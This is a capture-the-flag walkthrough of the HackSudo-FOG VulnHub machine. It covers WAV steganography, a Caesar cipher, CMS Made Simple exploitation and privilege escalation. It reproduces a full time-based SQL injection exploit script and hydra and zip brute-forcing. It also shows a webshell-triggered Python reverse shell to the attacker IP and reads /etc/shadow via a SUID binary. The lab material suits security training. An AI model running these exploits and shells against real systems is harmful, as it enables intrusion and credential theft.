Penetration Testing No.23: hiding data in WAV files, look command privilege escalation, HackSudo-FOG


Target machine information

Download:

https://www.vulnhub.com/entry/hacksudo-fog,697/

Range: VulnHub.com

Target name: HackSudo-FOG

Difficulty: Easy

Release date: 14 May 2021

Hints: none

Goal: 4 flags

Lab environment

Attacker: VMware, Kali, 192.168.7.3

Target: VirtualBox, Linux, IP assigned by DHCP

Information gathering

Host discovery

Find the target's IP address on the local network with a ping sweep (-sP is the legacy spelling of -sn: host discovery only, no port scan)

sudo nmap -sP 192.168.7.1/24

The target is found at 192.168.7.130

Port scan

Enumerate the target's open ports and service versions (note the capital V in -sV, which is version detection)

sudo nmap -sV -p- 192.168.7.130 -oN fog.nmap

Several ports are open: 21 (ftp), 22 (ssh), 80 (http), 443 (https), 2049 (nfs) and 3306 (mysql). NFS on 2049 would normally deserve a showmount -e, but it is not needed for this box. Start with port 80.

Web penetration

Visit port 80
http://192.168.7.130

The home page plays a video and hides a link to "index1.html"; open it

http://192.168.7.130/index1.html

It is an image, and the page source contains comments hinting at a Caesar cipher and linking to a GitHub repository

https://github.com/hacksudo/SoundStegno

The repository is a tool for hiding a message inside a WAV file. It contains two Python scripts: SoundStegno.py embeds a message into a WAV file, and ExWave.py extracts the hidden message from it. Keep both hints, the cipher and the audio steganography, in mind; they are needed later.
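As an added example written for this walkthrough (it is not the code from the SoundStegno repository, and it also illustrates what the ExWave.py extraction step later in the walkthrough is doing), the following Python shows the LSB technique such tools rely on: a message is written one bit at a time into the least significant bit of successive 16-bit samples, which changes each sample by at most 1 and is inaudible, and the extractor reads the LSBs back until a terminator. The carrier WAV is a constructed sine tone built in memory; the one-bit-per-sample framing and the NUL terminator are assumptions of this example, so the real hacksudoSTEGNO.wav must still be read with the repository's own ExWave.py.

```python
"""LSB audio steganography on 16-bit PCM WAV: hide and extract.

Added example for this walkthrough; not the hacksudo/SoundStegno code.
Assumed scheme: one message bit per sample, most significant bit first,
message terminated by a NUL byte. The real SoundStegno.py / ExWave.py may
frame the message differently.
"""
import io
import math
import struct
import wave

TERMINATOR = b"\x00"


def make_test_wav(seconds=1.0, rate=8000, freq=440.0):
    """Constructed carrier: a 16-bit mono sine tone, returned as WAV bytes."""
    n = int(seconds * rate)
    samples = [int(12000 * math.sin(2 * math.pi * freq * i / rate)) for i in range(n)]
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(struct.pack("<%dh" % n, *samples))
    return buf.getvalue()


def _read_samples(wav_bytes):
    """Return (wave params, list of signed 16-bit samples)."""
    with wave.open(io.BytesIO(wav_bytes), "rb") as w:
        params = w.getparams()
        frames = w.readframes(w.getnframes())
    if params.sampwidth != 2:
        raise ValueError("only 16-bit PCM is handled here")
    return params, list(struct.unpack("<%dh" % (len(frames) // 2), frames))


def _write_samples(params, samples):
    """Write samples back with the carrier's original header parameters."""
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setparams(params)
        w.writeframes(struct.pack("<%dh" % len(samples), *samples))
    return buf.getvalue()


def hide(wav_bytes, message):
    """Embed message + NUL into the least significant bit of successive samples."""
    params, samples = _read_samples(wav_bytes)
    payload = message.encode("utf-8") + TERMINATOR
    bits = [(byte >> (7 - k)) & 1 for byte in payload for k in range(8)]
    if len(bits) > len(samples):
        raise ValueError("message needs %d samples, carrier has %d" % (len(bits), len(samples)))
    out = list(samples)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & ~1) | bit   # clear the LSB, then set it to the message bit
    return _write_samples(params, out)


def extract(wav_bytes):
    """Reassemble bytes from sample LSBs until the NUL terminator is seen."""
    _, samples = _read_samples(wav_bytes)
    out = bytearray()
    byte = 0
    for i, s in enumerate(samples):
        byte = (byte << 1) | (s & 1)
        if i % 8 == 7:
            if byte == 0:
                return out.decode("utf-8", errors="replace")
            out.append(byte)
            byte = 0
    raise ValueError("no terminator found; the carrier probably holds no LSB message")


def max_message_bytes(wav_bytes):
    """Capacity check: one bit per sample, minus the terminator byte."""
    _, samples = _read_samples(wav_bytes)
    return len(samples) // 8 - 1


if __name__ == "__main__":
    carrier = make_test_wav()
    stego = hide(carrier, "Username=fog:password=hacksudoISRO")
    print(extract(stego))
```

Two things worth checking on a real capture before trusting an extractor: the sample width (this handles 16-bit PCM only; 8-bit or stereo files need the read/write helpers adapted) and the capacity, which max_message_bytes() reports: at one bit per sample, a 1-second 8 kHz tone carries just under 1 KB.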

Directory scan

gobuster dir -u http://192.168.7.130 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,zip

Two directories and one text file are found; download the text file first and read it

wget http://192.168.7.130/dict.txt
cat dict.txt

It looks like a password list, possibly for brute-forcing SSH or FTP, but we have no username yet. Look at the fog directory, whose name matches the machine name

http://192.168.7.130/fog

It contains another fog directory

which is empty. Now check the cms directory

The page title gives it away: this is CMS Made Simple. Look for known vulnerabilities

https://www.exploit-db.com/

There are quite a few, so first confirm which version runs on the target by continuing the directory scan

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.7.130/cms -x php,html,txt

There is a doc directory; scan it too

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.7.130/cms/doc -x php,html,txt

The scan reveals CHANGELOG.txt; open it to read the version

http://192.168.7.130/cms/doc/CHANGELOG.txt

The version is 2.2.5, so we can look for a matching exploit

Exploit-DB lists an unauthenticated time-based SQL injection (CVE-2019-9053) affecting CMS Made Simple up to and including 2.2.9, i.e. everything below 2.2.10, which covers 2.2.5. Download it and try it.

exp.py (the Exploit-DB script, written for Python 2):

#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053

import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)

options, args = parser.parse_args()
if not options.url:
    print "[+] Specify an url target"
    print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
    print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
    print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
    exit()

# Injection point: the m1_idlist parameter of the News module's front-end
# action, reachable without authentication.
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""

salt = ''
wordlist = ""
if options.wordlist:
    wordlist += options.wordlist

def crack_password():
    global password
    global output
    global wordlist
    global salt
    dict = open(wordlist)
    for line in dict.readlines():
        line = line.replace("\n", "")
        beautify_print_try(line)
        if hashlib.md5(str(salt) + line).hexdigest() == password:
            output += "\n[+] Password cracked: " + line
            break
    dict.close()

def beautify_print_try(value):
    global output
    print "\033c"
    cprint(output,'green', attrs=['bold'])
    cprint('[*] Try: ' + value, 'red', attrs=['bold'])

def beautify_print():
    global output
    print "\033c"
    cprint(output,'green', attrs=['bold'])

def dump_salt():
    global flag
    global salt
    global output
    ord_salt = ""
    ord_salt_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_salt = salt + dictionary[i]
            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_salt)
            # Time-based blind oracle: sleep(TIME) only runs when the guessed
            # salt prefix (hex-encoded, 0x25 = '%' wildcard) matches the
            # cms_siteprefs 'sitemask' value, so a slow response confirms the guess.
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            salt = temp_salt
            ord_salt = ord_salt_temp
    flag = True
    output += '\n[+] Salt for password found: ' + salt

def dump_password():
    global flag
    global password
    global output
    ord_password = ""
    ord_password_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_password = password + dictionary[i]
            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_password)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            password = temp_password
            ord_password = ord_password_temp
    flag = True
    output += '\n[+] Password found: ' + password

def dump_username():
    global flag
    global db_name
    global output
    ord_db_name = ""
    ord_db_name_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_db_name = db_name + dictionary[i]
            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_db_name)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            db_name = temp_db_name
            ord_db_name = ord_db_name_temp
    output += '\n[+] Username found: ' + db_name
    flag = True

def dump_email():
    global flag
    global email
    global output
    ord_email = ""
    ord_email_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_email = email + dictionary[i]
            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_email)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            email = temp_email
            ord_email = ord_email_temp
    output += '\n[+] Email found: ' + email
    flag = True

dump_salt()
dump_username()
dump_email()
dump_password()

if options.cracking:
    print colored("[*] Now try to crack password")
    crack_password()

beautify_print()

Install the script's only third-party dependency and run it against the cms directory (Python 2):

python2 -m pip install termcolor
python2 exp.py -u http://192.168.7.130/cms

The script recovers the admin username hacksudo and the password hash. Several online hash-lookup sites failed to crack it, which is expected: as crack_password() in the script shows, CMS Made Simple stores md5(salt + password), and the salt (the sitemask value the script dumps first) is unknown to plain MD5 lookup tables. The dictionary cracking built into the script (-c -w dict.txt), or hashcat -m 20 with the hash in hash:salt form, would test a wordlist against the salted hash offline. Also note that the script decides each character on a single sleep(TIME) threshold with TIME = 1, so on a slow or noisy network a character can be mis-read; raise TIME if the dumped values look wrong.

Password brute-forcing

Now use the username and the dictionary downloaded earlier to brute-force FTP and SSH and see what turns up

hydra -l hacksudo -P dict.txt 192.168.7.130 ftp

hydra -l hacksudo -P dict.txt 192.168.7.130 ssh

FTP brute-forcing yields the password hackme; SSH yields nothing

Access FTP

ftp hacksudo@192.168.7.130
enter the password hackme

Login succeeds; list the files and download all of them

ls -all
get flag1.txt
cd hacksudo_ISRO_bak

get authors.txt
get installfog
get secr3tSteg.zip
exit
ll

cat flag1.txt
cat authors.txt
cat installfog

Nothing useful there; see what is in the archive

unzip secr3tSteg.zip

It asks for a password; brute-force it with rockyou

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u secr3tSteg.zip

With the password recovered the archive can be extracted

unzip secr3tSteg.zip
enter the password fooled

Two files come out, one of them a WAV file, which brings back the WAV steganography hint. Check secr3t.txt first, then fetch the tool

cat secr3t.txt
git clone https://github.com/hacksudo/SoundStegno.git

secr3t.txt contains nothing useful for now; use the tool to extract the message hidden in the WAV

python3 SoundStegno/ExWave.py -f hacksudoSTEGNO.wav

We get an enciphered string; recalling the Caesar cipher hint, decode it

zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
https://www.dcode.fr/chiffre-cesar

The plaintext (shift 3) is wwww.localhost/fog Username=fog:password=hacksudoISRO. Try these credentials on the CMS admin login
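The shift can be recovered offline instead of through a web service. The following added example (written for this walkthrough; it is not the page's code or dcode.fr's) tries all 25 shifts on the ciphertext above and picks the one whose output contains a likely crib such as "password". The crib list is a hypothetical choice for this box; only ASCII letters are shifted, so the '.', '/', '=' and ':' separators survive unchanged, as they do in the real plaintext.

```python
"""Caesar cipher brute force for the hint recovered from hacksudoSTEGNO.wav.

Added example for this walkthrough, not code from the box. Only ASCII
letters are rotated; digits, punctuation and spaces are left alone.
"""
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase

# Ciphertext as extracted from the WAV file in the walkthrough.
CIPHERTEXT = "zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR"


def caesar_decrypt(text, shift):
    """Move every ASCII letter back by `shift` positions, wrapping within the alphabet.

    A negative shift encrypts, so decrypt(decrypt(x, k), -k) == x.
    """
    out = []
    for ch in text:
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) - shift) % 26])
        elif ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) - shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def all_shifts(text):
    """Every candidate plaintext keyed by shift 1..25 (shift 0 is the input itself)."""
    return {k: caesar_decrypt(text, k) for k in range(1, 26)}


def find_shift(text, cribs=("password", "username", "user", "pass", "flag", "http")):
    """Return (shift, plaintext) for the first shift whose output contains a crib, else None.

    The crib list is a hypothetical choice for this example; extend it per target.
    """
    for k, plain in all_shifts(text).items():
        low = plain.lower()
        if any(c in low for c in cribs):
            return k, plain
    return None


if __name__ == "__main__":
    for k, plain in all_shifts(CIPHERTEXT).items():
        print("%2d: %s" % (k, plain))
    print("best guess:", find_shift(CIPHERTEXT))
```

Printing all 25 candidates and reading them by eye is the usual first move; the crib search only automates that glance and will pick the wrong shift if the plaintext happens to contain none of the listed words.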

http://192.168.7.130/cms/admin/login.php

Login succeeds. In the File Manager module there is a file containing a one-line PHP webshell; the file manager can rename it

Change the extension to .php and then spawn a reverse shell

Renaming fails, so make a copy instead

The copy succeeds; open it directly to verify that it executes

http://192.168.7.130/cms/uploads/1.php?cmd=id

Commands execute, so start the reverse shell

On the Kali attacker, listen on port 4444

nc -lvvp 4444

Trigger the reverse shell (the browser URL-encodes the spaces and quotes for you; with curl, pass the cmd value through -G --data-urlencode instead)

http://192.168.7.130/cms/uploads/1.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.7.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The shell connects back; upgrade it to an interactive TTY

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
press Ctrl+Z to background the shell

stty -a
stty raw -echo;fg
reset

stty rows 21 columns 105

The TTY is ready; look for a way to escalate privileges

The second flag is in /var/www

cat flag2.txt

sudo -l asks for a password, but the SUID search turns something up

find / -perm -u=s -type f 2>/dev/null

look is SUID root. look prints every line of a file that starts with a given prefix, and an empty prefix matches every line, so a SUID look reads any file root can read, including the shadow file

/usr/bin/look '' '/etc/shadow'

Brute-forcing the shadow hashes

Two of the accounts have password hashes; save those lines and crack them

vi carck.txt

Start cracking

john carck.txt

John recovers isro's password, qwerty; log in over SSH

ssh isro@192.168.7.130
enter the password qwerty

Login succeeds; look around the home directory

Another flag, and a fog directory

cd fog
ls -all

There is a fog binary that runs with root privileges; execute it

./fog

It drops into a Python 2 interpreter, so use it to escalate directly

import os
os.system('/bin/bash')
id

Root obtained; go to /root for the last flag

cd /root
ls -all
cat root.txt

root.txt obtained, game over